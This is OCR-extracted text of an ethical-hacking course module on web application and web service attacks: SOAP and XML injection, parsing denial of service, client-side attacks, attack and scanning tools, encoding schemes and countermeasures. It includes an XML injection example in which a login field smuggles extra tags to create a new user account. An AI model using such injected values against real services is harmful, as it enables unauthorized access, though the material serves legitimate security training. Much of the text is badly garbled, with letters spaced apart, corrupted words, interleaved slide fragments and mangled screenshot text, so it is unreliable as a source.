d a ta b a s e q u e r ie s to fa il f o r le g it im a t e u s e rs
Example:
B y d e f a u lt in A S P .N E T , t h e m a x im u m a llo w e d c o n n e c tio n s in th e p o o l is &
1 0 0 a n d t i m e o u t is 3 0 s e c o n d s
th a t n o o n e e ls e w o u ld b e a b le to u s e th e d a ta b a s e - r e la te d p a rts o f th e
a p p lic a tio n
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
C o n n e c tio n P o o l D o S
E x a m p le :
Attack
Footprint Web Analyze Web Authorization Perform Attack
Infrastructure Applications Schemes Injection Attacks Web App Client
W e b A p p H a c k in g M e t h o d o lo g y
A t ta c k W e b A p p C lie n t
AttackWebAppClient
J A tta c k e rs in te r a c t w ith th e s e r v e r - s id e a p p lic a tio n s in u n e x p e c te d w a y s in o r d e r to p e r fo r m m a lic io u s
a c t io n s a g a in s t t h e e n d u s e rs a n d a c c e s s u n a u th o r iz e d d a ta
C o p y r ig h t © b y EC-Council. A l l R ig h ts R e s e r v e d R e p r o d u c t i o n i s S t r i c t l y P r o h ib it e d .
A tta c k W e b A p p C lie n t
© HTTP H e a d e r In je c tio n
© F ra m e In je c tio n
© R e q u e s t F o rg e ry A tta c k s
© S ession F ix a tio n
© P riv a c y A tta c k s
© A c tiv e X A tta c k s
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
A tta c k W e b S e r v ic e s
AttackWebServices CEH
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
Cl
r jf A tta c k W e b S e r v ic e s
© SOAP In je c tio n
© X M L In je c tio n
© W S D L P ro b in g A tta c k s
© In fo r m a tio n Leakage
© D a ta b a s e A tta c k s
W eb S e rv ic e s P ro b in g A tta c k s CEH
Urtifwd ilhiul lUtbM
9 These attacks w o rk s im ila r t o SQL in je c tio n attacks « A tta c k e r uses th e se requests t o in clude m alicious
c o n te n ts in SOAP requests and analyzes errors t o gain a
deeper und erstanding o f p o te n tia l s ecurity weaknesses
C o p y r ig h t © b y EG-Gouacil.A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e s P r o b in g A tta c k s
In th e f ir s t s te p , th e a tta c k e r tr a p s th e W S D L d o c u m e n t fr o m w e b s e rv ic e tr a f fic a nd
a n a lyze s it to d e te r m in e th e p u rp o s e o f th e a p p lic a tio n , fu n c tio n a l b re a k d o w n , e n tr y p o in ts ,
a n d m e ssa g e ty p e s . T h e se a tta c k s w o r k s im ila r ly to SQL in je c tio n a tta c k s . T h e a tta c k e r th e n
c re a te s a s e t o f v a lid re q u e s ts b y s e le c tin g a s e t o f o p e ra tio n s , a n d fo r m u la tin g th e re q u e s t
m e ssa ge s a c c o rd in g to th e ru le s o f th e X M L S ch em a t h a t can be s u b m itte d t o th e w e b s e rv ic e .
T h e a tta c k e r uses th e s e re q u e s ts t o in c lu d e m a lic io u s c o n te n t in SO AP re q u e s ts a n d a n a ly z e s
e rro rs to g a in a d e e p e r u n d e r s ta n d in g o f p o te n tia l s e c u r ity w e a k n e s s e s .
F IG U R E 1 3 .5 3 : W e b S e r v ic e s P r o b in g A tta c k s
J A t ta c k e r in je c ts m a lic io u s q u e ry s tr in g s in t h e u s e r in p u t fie ld to b y p a s s w e b s e r v ic e s
0 d )®
Server Response
O O h ttp : //ju g g y b o y . c o m /w s /p r o d u c ts .a s m x
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e A tta c k s : S O A P In je c tio n
Server Response
Q © http://iuggyboycom/ws/products.asm x
FIGURE 1 3 .5 4 : SO A P I n je c tio n
X M L d a ta b a s e w ith b o g u s e n tr ie s
D o S a tta c k s
S e rv e r S id e C o d e
http://juggyboy.com/ws/login.asmx
J < u s e r>
■ < u s e m ame > j a s on< / u s e m am e> C re a te s n e w
m ark@ certifiedhacker.com </mail> </user>
■ < p a s s w o rd > a ttc )c < /p a s s w o rd >
<u$er> <username>Jason</usemame> ■ < u s e r id > 1 0 5 < /u s e r id >
o n th e s e rv e r
<password>attack</password> ■ < m a il> ja s o n @ ju g g y b o y • c o n K /m a il>
<userid>105</useridxm ail>jason (Sjuggyboy.com ■ < ^ u s e r>
< /u s e r s >
C o p y r i g h t © b y E C - G a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e A tta c k s : X M L In je c tio n
T h e p ro c e s s in w h ic h th e a tta c k e r e n te rs v a lu e s t h a t q u e ry X M L w ith v a lu e s t h a t ta k e
a d v a n ta g e o f e x p lo its is k n o w n as an X M L in je c tio n a tta c k . A tta c k e r s in je c t X M L d a ta a n d ta gs
in to u s e r in p u t fie ld s to m a n ip u la te X M L s c h e m a o r p o p u la te X M L d a ta b a s e w ith b o g u s e n trie s .
X M L in je c tio n can be used to b yp a ss a u th o r iz a tio n , e s c a la te p riv ile g e s , a n d g e n e ra te w e b
s e rv ic e s DoS a tta c k s .
S e r v e r S id e C o d e
o o http://j1Jggyboy.com/ws/10gin.asmx
< ? x n l v e r s io n ■ 1 . 0 * "׳e n c o d i n g - ' I S O ־8 8 5 9 ־l " ? >
< u s « rs >
Account Login < u s *r>
< u s • r n M M > g a n d a 1 £*< / u s « r n « n • >
< p a s 3 w o rd > ! a 3 < /p a s s w o r d >
U sernam e Mark < u s e r id > 1 0 1 < /u s « r id >
< r ־. a i l > g a n d a l f ■ 'r . i d d l e e a r t h . c o m < / r ־. a i l >
</user>
I
<ua*rna.*n#> ja s o n < /u s « rn a m e >
<pas3word>attck</pa3sword>
•
;
!
C re a te s n e w
W eb S e rv ic e s P a rs in g A tta c k s CEH
p a rs e r to c re a te a d e n ia l- o f - s e r v ic e a tta c k o r g e n e ra te lo g ic a l e r r o r s in w e b s e r v ic e r e q u e s t
p r o c e s s in g
A t t a c k e r q u e r ie s f o r w e b s e r v ic e s w it h a A tta c k e rs s e n d a p a y lo a d t h a t is
g r a m m a t ic a lly c o r r e c t S O A P d o c u m e n t t h a t e x c e s s iv e ly la r g e t o c o n s u m e a ll s y s te m s
c o n t a in s in f in it e p r o c e s s in g lo o p s r e s u lt in g re s o u rc e s r e n d e r in g w e b s e r v ic e s
in e x h a u s tio n o f X M L p a rs e ra n d C P U in a c c e s s ib le t o o t h e r le g itim a te u s e rs
re s o u rc e s
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e s P a r s in g A tta c k s
R e c u r s iv e P a y lo a d s
O v e r s iz e P a y lo a d s
s o a p U I is a o p e n s o u r c e
f u n c tio n a l te s tin g t o o l, m a in ly
u s e d f o r w e b s e r v ic e t e s tin g
It s u p p o rts m u ltip le p r o to c o ls
s u c h a s SO AP , REST, H TTP, JM S ,
A M F , a n d JD BC
A t ta c k e r c a n u s e th is t o o l t o
c a rry o u t w e b s e r v ic e s p r o b in g ,
S O A P in je c tio n , X M L in je c tio n ,
a n d w e b s e r v ic e s p a r s in g
a tta c k s
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h ib it e d
W e b S e r v ic e A tta c k T o o l: s o a p U I
j A lto v a XMl S p y
: Fic E it Frcject >M- DTDfSchcmo Cchcrno design XSLJXQucry Authentic Convert View Ercwso׳
A lto v a X M L S p y is t h e X M L e d ito r a n d
d e v e lo p m e n t e n v ir o n m e n t fo r
:W
SDL SOAP Tools W
indow Help
a i a . a 12- ׳,a j 1^ ip iia in ig iB ■ !r , W H ff iilF b
m o d e lin g , e d itin g , tr a n s fo r m in g , a n d
; כ. jg 1> ■ ft, [^<s- <y B ! y 00 & -
d e b u g g in g X M L - r e la te d te c h n o lo g ie s
ncyR 3 XSL O u tp u t , h tm t
httpTVivsw'AS orgf20
m/XML£cnerria-1nsta פד
nee־
xslscnenraLocation
h ttp /x m s 3y. neVag e r
c/fschem astoersonn
el
Ksi:fot־eachse1ect="
n1:Firs1Name">
> I I i i I 1I י
span s ty le -'col or: navy:
font-famity:Arial;
A
־P e rs o n n
The
Q 'h * A * n c >«3 © A q e n ts
X Call Stack
| V<lu» / Atlrih N»<n»____ D ccunrnt
tJ ( ) Per v jt aDato Elcniat xsl:rcr-eech TheAgencyR3.xsf Tertiporarr Re$» *
tl () ״lrsNane Oam
ert xsl:fo־־eo=h Thc.AgcncyR3.x5H Temporary Res_ ׳
C o p y r i g h t © b y E C - C a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e A tta c k T o o l: X M L S p y
^ 2 S o u rc e : h t t p : / / w w w . a lt o v a . c o m
^־־ M o d u le F lo w
^ W e b A p p P en T e s tin g W e b A p p C o n c e p ts
^ S e c u r ity T o o ls W e b A p p T h r e a ts
C o u n te r m e a s u r e s fs=9 H a c k in g M e th o d o lo g y
S b )
•^י־-
S o u rc e : h t t p : / / w w w . p o r t s w ig g e r . n e t
J The to o l re p o rts on th e p re d ic ta b ility and e n tro p y o f th e cookie and w h e th e r critic a l in fo rm a tio n , such as user nam e and
passw ord, are included in th e cookie values
F o u n d s t o n e | C o o k ie D ig g e r
'/* tea URLs
ןi/Vim* .ווק/com 31
accounts gootfe coro/Seracelogn A ih ,' f_soace־״et «tnp v.3A"2.׳F 2 ..־ffrai
m»l.google.conz_,'na»-1t*1c/_/)s./>Mr.lrj11f1*Ai1er»X04lWI$a»St.«n/rv'*1/| ' jd fn
https y/tnal.google oorvmalAvO.Ai •28v1ew*«ptver^hrt4nw»*r4
https://mtti
si google cwn/VnaHi/UAj « 2hin»^apl w nchm > 6 t1 4
(jw d «*■**־p»e
h ttp ://w w w .m c a fe e .c o m
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p lic a tio n H a c k in g T o o l: C o o k ie D ig g e r
S o u rc e : h ttp ://w w w .m c a fe e .c o m
C o o k ie D ig g e r is a to o l th a t d e te c ts v u ln e r a b le c o o k ie g e n e r a tio n and th e in s e c u re
im p le m e n ta tio n o f se ssio n m a n a g e m e n t by w e b a p p lic a tio n s . T his to o l is b a se d o n th e
c o lle c tio n a n d e v a lu a tio n o f c o o k ie s b y a w e b a p p lic a tio n used b y m a n y users.
C e r ta in ty a n d e n tr o p y o f th e c o o k ie a re fa c to rs o n w h ic h th e to o l re lie s . T h e c o o k ie v a lu e s
c o n ta in v a lu a b le in fo r m a tio n su ch as th e lo g in d e ta ils o f th e u s e r (u s e r n a m e a n d p a s s w o rd ).
I t a llo w s th e a tta c k e r to r e v ie w a n d m o d if y re q u e s ts c re a te d b y th e b r o w s e r b e fo re th e y a re s e n t to th e s e rv e r,
a n d to r e v ie w a n d m o d if y re s p o n s e s re tu rn e d fr o m th e s e rv e r b e fo re th e y a re r e c e iv e d b y th e b ro w s e r
F ile V ie w Io o ls H e lp
S u m m a ry M e s s a g e lo g P ro x y M anual R equest W e b S e r v ic e s S p id e r E x t e n s io n s S e s s io n ID A n a ly s is S c r ip t e d F r a g m e n ts C o m p a re
2 S u m m a ry
□ T r e e S e le c tio n n i t e r s c o n v e r s a t io n l i s t
U rl M e th o d s S ta tu s | S e t- C o o k ie C o m m e n ts S c n p ts
? (1 5 h ttp ://w w w .o w a s p .o ra :8 0 / GET 30 1 M o v e d .. □ □ □
° ־n b a n n e rs / □ □ □
o- n im a a e s / □ □ □
9 (1 3 in d e x p h p / □ □ □
O M a ln _ P a g e GET 200 OK □ E
o- □ s k in s / □ □ □
H ost P a th S ta tu s O r ig in
' ׳U U b/U b O T U t I h ttp /M v w w o w a s p o rg BU /s k in s / m o n o b o o k / m a in '•׳/־ 2DUO K
http:fA 1v w w .o w a s p .o rg 80 /s k in s / c o m m o n / IE F ix e s P ro x y
h ttp ://w w w .o w a s p .o r g .8 0 /s k in s / c o m m o n / c o m m o P ro x y
2 0 0 6 /0 6 /2 3 GET h t tp ://w w w .o w a s p o rg 8 0 /in d e x p h p /M a m _ P a g e P ro x y
2 0 0 6 /0 6 /2 3 ... G E T h t tp : //w w w . o w a s p .o r g .8 0 l/ P ro x y
h ttp ://w w w .o w a s p .o rg
C o p y r i g h t © b y E C - G a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p lic a tio n H a c k in g T o o l: W e b S c a r a b
S o u rc e : h t tp ://w w w .o w a s p .o r g
M In s ta n t S o u rc e
h t t p : / / w w w . b la z in g t o o ls . c o m
H ttp B e e
h t t p : / / w w w . oO o. n u
■ a — s ־
w 3 a f T e le p o r t P ro
h t t p : / / w 3 a f . s o u r c e fo r g e , n e t ^ ► ^4) h ttp : / / w w w .te n m a x . c o m
G N U W g e t W e b C o p ie r
h t t p : / / g n u w in 3 2 . s o u r c e f o r g e , n e t h t t p : / / w w w . m a x im u m s o f t . c o m
י
B la c k W id o w
h t t p : / / s o f t b y t e la b s . c o m
& H T T T R A C K
h t t p : / / w w w .h tt r a c k . c o m
f£3 c U R L
h t t p : / / c u r I. h a x x . s e
M ile S C A N P a ro s P ro
h t t p : / / w w w . m ile s c a n . c o m
C o p y r i g h t © b y E C - G a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
/ \ W e b A p p lic a tio n H a c k in g T o o ls
© H i l l RACK a v a ila b le a t h t t p : / / w w w . h t t r a c k . c o m
ModuleFlow
W e b A p p Pen T e s tin g
0 יI, W e b A p p C o n c e p ts
S e c u rity T oo ls
q y
& W e b A p p T h re a ts
C o u n te rm e a s u re s
W e b A p p lic a tio n H a c k in g T o o ls
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
^־־ M o d u le F lo w
V W e b A p p P en T e s tin g /jj&Mk W e b A p p C o n c e p ts
^ S e c u r ity T o o ls W e b A p p T h r e a ts
•.r"
C o u n te rm e a s u re s e5=־ H a c k in g M e th o d o lo g y
(j ' י
m
W e b A p p lic a tio n H a c k in g T o o ls
vf 1
EncodingSchemes CEH
w a y y o u in te n d
a % 0a N e w lin e
« %20 space
A n H T M L e n c o d in g s c h e m e is used t o re p re s e n t u n u s u a l
c h a ra c te rs so t h a t th e y c a n be s a fe ly c o m b in e d w ith in an
HTML d o c u m e n t
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
E n c o d in g S c h e m e s
— —־ HTTP p ro to c o l a n d th e H T M L la n g u a g e a re th e tw o m a jo r c o m p o n e n ts o f w e b
a p p lic a tio n s . B o th th e s e c o m p o n e n ts a re te x t b a se d . W e b a p p lic a tio n s e m p lo y e n c o d in g
s c h e m e s t o e n s u re b o th th e s e c o m p o n e n t h a n d le u n u s u a l c h a ra c te rs a n d b in a r y d a ta s a fe ly .
T h e e n c o d in g s c h e m e s in c lu d e :
m U R L E n c o d in g
Q %3d
Q %0a New l i n e
9 %20 space
E n c o d in g S c h e m e s CE H
( C o n t 1(!)
tt Exam ple:
Jason 123B684A D 9
E n c o d in g S c h e m e s ( C o n t ’d )
Unicode Encoding Base 64 Encoding Hex Encoding
U T F -8
It is a variable-length encoding
standard that uses each byte
expressed in hexadecimal and
preceded by the %prefix:
%c2%a9
%«2%89%a0
TABLE 1 3 .2 : E n c o d in g S c h e m e s T a b le
L im it th e le n g th o f u s e r in p u t
Use c u s to m e r r o r m essages
D isable c o m m a n d s lik e x p _ c m d s h e ll
Is o la te d a ta b a s e s e rv e r a n d w e b s e rv e r
JT
1 A lw a y s use m e th o d a ttr ib u te s e t t o POST
M o v e e x te n d e d s to re d p ro c e d u re s t o an is o la te d s e rv e r
SQL
Server V a lid a te a n d s a n itiz e user in p u ts passed t o th e d a ta b a s e
H o w to D e f e n d A g a in s t S Q L I n je c tio n A tta c k s
T o d e f e n d a g a i n s t S Q L i n j e c t i o n a t t a c k s , v a r i o u s t h i n g s h a v e t o b e t a k e n c a r e o f l i ke
u n c h e c k e d u s e r -in p u t to d a t a b a s e - q u e r i e s sh o u ld n o t b e a llo w e d to pass. Every u s e r v ariab le
p a s s e d to th e d a t a b a s e sh o u ld b e v alid a te d a n d sanitized. T he given in p u t sh o u ld be c h e c k e d
f o r a n y e x p e c t e d d a t a t y p e . U s e r i n p u t , w h i c h is p a s s e d t o t h e d a t a b a s e , s h o u l d b e q u o t e d .
e Limit t h e l e n g t h o f u s e r i n p u t
e M o n i t o r DB t r a f f i c u s i n g a n IDS, W A P
e D i s a b l e c o m m a n d s like x p _ c m d s h e l l
e Isolate d a t a b a s e s e rv e r a n d w e b se rv e r
e A lw ay s u s e m e t h o d a t t r i b u t e s e t t o POST
0 / H o w to D e f e n d A g a in s t C o m m a n d I n je c tio n F la w s
^׳ ' The sim plest way to protect against com m and injection flaws is t o avoid them
w h e r e v e r p ossible. S o m e la n g u a g e specific libraries p e r f o r m id entical fu n c tio n s fo r m a n y shell
c o m m a n d s a n d s o m e s y s t e m calls. T h e s e li b ra ri e s d o n o t c o n t a i n t h e o p e r a t i n g s y s t e m shell
i n t e r p r e t e r , a n d s o i g n o r e m a x i m u m s h e l l c o m m a n d p r o b l e m s . F o r t h o s e c a l l s t h a t m u s t still b e
u s e d , s u c h a s c a l l s t o b a c k e n d d a t a b a s e s , o n e m u s t c a r e f u l l y v a l i d a t e t h e d a t a t o e n s u r e t h a t it
d o e s n o t c o n t a i n m a l i c i o u s c o n t e n t . O n e c a n a l s o a r r a n g e v a r i o u s r e q u e s t s in a p a t t e r n , w h i c h
e n s u r e s t h a t all g i v e n p a r a m e t e r s a r e t r e a t e d a s d a t a i n s t e a d o f p o t e n t i a l l y e x e c u t a b l e c o n t e n t .
M o s t s y s t e m calls a n d t h e u s e o f s t o r e d p r o c e d u r e s w i t h p a r a m e t e r s t h a t a c c e p t valid i n p u t
strings to a c c e ss a d a t a b a s e or p r e p a r e d s t a t e m e n t s pro v id e significant p ro te c tio n , e n su rin g
t h a t t h e s u p p l i e d i n p u t is t r e a t e d a s d a t a , w h i c h r e d u c e s , b u t d o e s n o t c o m p l e t e l y e l i m i n a t e t h e
risk involved in these external calls. One can alw ays authorize the input to ensure the
p r o t e c t i o n o f t h e a p p l i c a t i o n in q u e s t i o n . L e a s t p r i v i l e g e d a c c o u n t s m u s t b e u s e d t o a c c e s s a
d a t a b a s e s o t h a t t h e r e is t h e s m a l l e s t p o s s i b l e l o o p h o l e .
1 3 x 5 _ 7
▼
2
% 4 6 8
/
\ / \ y
U se a w e b F ilt e r in g s c r ip t o u t p u t C o n v e r t a ll n o n - D e v e lo p s o m e s ta n d a rd o r
a p p lic a tio n f ir e w a l l c a n a ls o d e f e a t XSS a lp h a n u m e r ic c h a ra c te rs s ig n in g s c rip ts w ith p r iv a te
t o b lo c k t h e v u l n e r a b il it ie s b y t o H T M L c h a r a c te r a n d p u b lic k e y s t h a t
H o w to D e f e n d A g a in s t X S S A tta c k s
| T h e f o l l o w i n g a r e t h e d e f e n s i v e t e c h n i q u e s t o p r e v e n t XSS a t t a c k s :
Q C h e c k a n d v a l i d a t e all t h e f o r m f i e l d s , h i d d e n f i e l d s , h e a d e r s , c o o k i e s , q u e r y s t r i n g s , a n d
all t h e p a r a m e t e r s a g a i n s t a r i g o r o u s s p e c i f i c a t i o n .
© I m p l e m e n t a s t r i n g e n t s e c u r i t y policy.
© F il te r t h e s c r i p t o u t p u t t o d e f e a t XSS v u l n e r a b i l i t i e s w h i c h c a n p r e v e n t t h e m f r o m b e i n g
tra n sm itte d to users.
© T h e e n t i r e c o d e o f t h e w e b s i t e h a s t o b e r e v i e w e d if it h a s t o b e p r o t e c t e d a g a i n s t XSS
a t t a c k s . T h e s a n i t y o f t h e c o d e s h o u l d b e c h e c k e d b y r e v i e w i n g a n d c o m p a r i n g it a g a i n s t
e x a c t specifications. T h e a r e a s sh o u ld b e c h e c k e d as follow s: t h e h e a d e r s , as well as
S e c u re t h e r e m o te a d m in is tra tio n
a n d c o n n e c tiv ity te s tin g
P r e v e n t use o f u n n e c e s s a ry
C o n fig u re t h e f ir e w a ll t o fu n c tio n s s u c h as g e ts , s trc p y ,
d e n y e x te r n a l I n te r n e t a n d r e tu rn a d d re s s e s fr o m
C o n tr o l M e s s a g e P ro to c o l o v e r w r it t e n e tc .
P re v e n t t h e s e n s itiv e
in fo r m a tio n
f r o m o v e r w r itin g
D a ta p ro c e s s e d b y th e
a tta c k e r s h o u ld b e s to p p e d
f r o m b e in g e x e c u te d
P e rfo rm th o r o u g h
in p u t v a lid a tio n
H o w to D e f e n d A g a in s t D o S A tta c k s
ל T h e f o l l o w i n g a r e t h e v a r i o u s m e a s u r e s t h a t c a n b e a d o p t e d t o d e f e n d a g a i n s t DoS
attacks:
0 P e rfo rm t h o r o u g h in p u t validation.
M a in ta in and u p d a te a secure
re p o s ito ry o f XM L schem as
H o w to D e f e n d A g a in s t W e b S e rv ic e s A tta c k s
© C onfigure WSDL A ccess C ontrol Perm issions to g ran t or d en y access to any type of
W SD L-based SOAP m e s sa g e s.
© U s e d o c u m e n t - c e n t r i c a u t h e n t i c a t i o n c r e d e n t i a l s t h a t u s e SAML.
© Block e x t e r n a l r e f e r e n c e s a n d u s e p r e - f e t c h e d c o n t e n t w h e n d e - r e f e r e n c i n g URLs .
© D e p l o y w e b - s e r v i c e s - c a p a b l e f i r e w a ll s c a p a b l e o f S O A P - a n d ISAPI-level filterin g.
8 N e v e r s u b m it session d a ta as p a rt
o f a GET, POST
W e b A p p lic a tio n C o u n te r m e a s u r e s
A v o i d u s i n g r e d i r e c t s a n d f o r w a r d s if d e s t i n a t i o n p a r a m e t e r s c a n n o t b e a v o i d e d ; e n s u r e t h a t
t h e s u p p l i e d v a l u e is v a l i d , a n d a u t h o r i z e d f o r t h e u s e r .
Cross-Site R e q u e s t Forgery
© Log o f f i m m e d i a t e l y a f t e r u s i n g a w e b a p p l i c a t i o n a n d c l e a r t h e h i s t o r y .
© Do n o t a l l o w y o u r b r o w s e r a n d w e b s i t e s t o s a v e login d e ta i ls .
© C h e c k t h e H T T P R e f e r r e r h e a d e r a n d w h e n p r o c e s s i n g a P O S T , i g n o r e URL p a r a m e t e r s .
© U s e SSL f o r all a u t h e n t i c a t e d p a r t s o f t h e a p p l i c a t i o n .
© V e r i f y w h e t h e r all t h e u s e r s ' i d e n t i t i e s a n d c r e d e n t i a l s a r e s t o r e d in a h a s h e d f o r m .
© N e v e r s u b m i t s e s s i o n d a t a a s p a r t o f a G ET , P O S T .
e
such as U nicode to affect th e d ire c to ry trave rsal
S Im p le m e n t cookie's tim e o u t
W e b A p p lic a tio n C o u n te r m e a s u r e s ( C o n t ’d )
© N o n - S S L r e q u e s t s t o w e b p a g e s s h o u l d b e r e d i r e c t e d t o t h e SSL p a g e .
© C o n f i g u r e SSL p r o v i d e r t o s u p p o r t o n l y s t r o n g a l g o r i t h m s .
© E n s u r e t h e c e r t i f i c a t e is v a l i d , n o t e x p i r e d , a n d m a t c h e s all d o m a i n s u s e d b y t h e s i t e .
© B a c k e n d a n d o t h e r c o n n e c t i o n s s h o u l d a l s o u s e SSL o r o t h e r e n c r y p t i o n t e c h n o l o g i e s .
D irectory T raversal
© W e b s e r v e r s s h o u l d b e u p d a t e d w i t h s e c u r i t y p a t c h e s in a t i m e l y m a n n e r .
S ecurity File I n j e c ti o n
M isconfiguration A ttack
Configure all security Perform type, pattern, and Strongly validate user input
mechanisms and tu rn o ff all d om a in value va lid a tio n on all
C onsider im plem enting a
unused services input data
c h ro o t ja il
Setup roles, permissions, and Make LDAP filte r as specific as
PHP: Disable a llo w _ u rl_fop e n
accounts and disable all possible
and a llow _url_include in
d e fa u lt accounts orchange Validate and re strict the
php.ini
th e ir d efa ult passwords a m o u n t o f data re tu rn e d to
th e user PHP: Disable register_globals
Scan fo r latest security
and use E_STRICTtofind
vulnerabilities and apply the Im plem ent tig h t access c o n tro l
uninitialized variables
latest se curity patches on th e data in th e LDAP
d ire cto ry PHP: Ensure th a t all file and
Perform d yna m ic testin g and stream s fu n c tio n s (stream _*)
source code analysis are ca refu lly ve tte d
W e b A p p lic a tio n C o u n te r m e a s u r e s ( C o n t ’d )
Security M isconfiguration
© C o n f i g u r e all s e c u r i t y m e c h a n i s m s a n d t u r n o f f all u n u s e d s e r v i c e s .
© S e t u p r o l e s , p e r m i s s i o n s , a n d a c c o u n t s a n d d i s a b l e all d e f a u l t a c c o u n t s o r c h a n g e t h e i r
default passw ords.
LDAP I n j e c t i o n A t t a c k s
© P e r f o r m t y p e , p a t t e r n , a n d d o m a i n v a l u e v a l i d a t i o n o n all i n p u t d a t a .
© M a k e L DA P f i l t e r s a s s p e c i f i c a s p o s s i b l e .
© I m p l e m e n t t i g h t a c c e s s c o n t r o l o n t h e d a t a in t h e L D A P d i r e c t o r y .
© P e rf o rm d y n a m ic te s tin g a n d s o u r c e c o d e analysis.
H o w to D e f e n d A g a in s t W e b
C E H
A p p lic a tio n A tta c k s
M a k e LD A P f i l t e r
as s p e c ific a s p o s s ib le
To defend against web application attacks, you can follow the counterm easures
s t a t e d p reviously. To p r o t e c t t h e w e b s e r v e r, y o u c a n u s e W AF firew all/ID S a n d filter p a c k e ts .
You n e e d t o c o n s t a n tl y u p d a t e t h e s o f t w a r e using p a t c h e s to k e e p t h e s e r v e r u p - t o - d a t e a n d to
protect it f r o m attackers. Sanitize and filter u s e r input, analyze the source code f o r SQL
injection, a n d m in im iz e u se of th i r d - p a r ty a p p lic a tio n s to p r o t e c t t h e w e b ap p licatio n s. You can
also u se s to re d p r o c e d u r e s a n d p a r a m e t e r q u e rie s to retrie v e d a ta a n d disable v e r b o s e e rr o r
m e s sa g e s, w hich can guide th e a tta c k e r w ith s o m e useful in fo rm atio n an d u se c u sto m e rro r
p a g e s t o p r o t e c t t h e w e b a p p l i c a t i o n s . T o a v o i d SQL i n j e c t i o n in t o t h e d a t a b a s e , c o n n e c t u s i n g a
n o n -p r iv ile g e d a c c o u n t a n d g r a n t le a s t privileges to t h e d a t a b a s e , ta b le s, a n d c o lu m n s . D isable
c o m m a n d s like x p _ c m d s h e l l , w h i c h c a n a f f e c t t h e O S o f t h e s y s t e m .
M o d u l e F lo w
W e b A pp P en Testing W eb A pp C oncepts
0 י I,
W eb A pp Threats
&
^־־ M o d u le F lo w
N o w w e wi l l d i s c u s s w e b a p p l i c a t i o n s e c u r i t y t o o l s . W e b a p p l i c a t i o n s e c u r i t y t o o l s
h e l p y o u t o d e t e c t t h e p o s s i b l e v u l n e r a b i l i t i e s in w e b a p p l i c a t i o n s a u t o m a t i c a l l y . P r i o r t o t h i s ,
w e discussed w e b application c o u n te r m e a s u re s th a t p re v e n t attack ers from exploiting w e b
a p p l i c a t i o n s . In a d d i t i o n t o c o u n t e r m e a s u r e s , y o u c a n a l s o e m p l o y s e c u r i t y t o o l s t o p r o t e c t
y o u r w e b a p p l i c a t i o n s f r o m b e i n g h a c k e d . T o o l s in a d d i t i o n t o t h e c o u n t e r m e a s u r e s o f f e r m o r e
protection.
^ W e b A pp P en T esting W e b A pp C oncepts
O k
A c u n e tix W e b V u ln e r a b ility S c a n n e r i
services
08Msam«r :
OHTTPEdto־
» O cn > * site sc ro trg (v en ted) CIO)
£ Q SQ
L׳ip ar (21)
west wtneoMtMS 3rd conpro׳T;« tne 1
backend database anfl'or de*xe you'
^ *Hnpsmrte י יO *׳od ca ccn er o r ireseace (3]
e Tests w e b fo r m s a nd p a s s w o rd - vfc HTTPPUZJC••:׳ 9-{l)
S A1.rt*>P*־׳n« « '׳fpe*r » O ASPJETef««r ■ne*M
ft O Crow Prone Senjlrtg (S] S ToUl alctto found
p r o te c te d areas »C O w e < te * J t
9 O U « .* J e - 0J s a « « 1* n t n Jeai O High
»web S<rvcc & O Mwllum
» O lo on p flg etW M o o'd o u ew rgo tta c
s It in c lu d e s an a u to m a tic c lie n t
Web Se^vrr* Searme ^ :״
Web Se ׳v«?e* td * r 9 O OPTIONS * c t o d ■ en eb lid (1) O>nw
B-itJ Co*־־91x«ton S ^ S n w i C o d » * V iau l S k u f Dai) 1 O informational
s c rip t a n a ly z e r a llo w in g f o r »1 ^ b-cr psoc web sarvar ׳c 90 ׳r dad
•• S:**״
,•Hl'gv >■ ^ 0 0 6 : Prcntp•^ ntpnikn* for l>1i 2j target information ht1p://tett 81pnetvuinweb ri
s e c u rity te s tin g o f A jax and W eb 5:«™־1j< «׳ot
» O < * 06 : :' 0e® tx a y .r e t se r s < מc fl
2 .0 a p p lic a tio n s li 1CTGeneral i 9 008: logn page CIO)
7123 MQuMti
S P^ff-ae'U»a»tr5
Verso ״Infwm own fi O type Input wltt *utocofttd v Stan It flnuhtd
t \ S^part Ctntm
<L
Ytrr.o+1
-g ) LKr :0.2001:30.02.SQLn«a־n ״״׳-Srd) ■fr,mine»t.a%px' a
10*0 O l J i J / , Mushed scanning.
UMT M«1.« (p0C ] £
: ״AcuStrsa ■ 4
0
10.20 01:22.32, Savno scan re»J!3 זdatabase...
12.20 01:32.39, Dcnr wv n , b d 9 » « r.
10.2001:32.39,Fua «*־D uffer*.
http://www.acunetix.com
C opyright © by EC-Gauactl. A ll Rights Reserved. Reproduction is S trictly Prohibited.
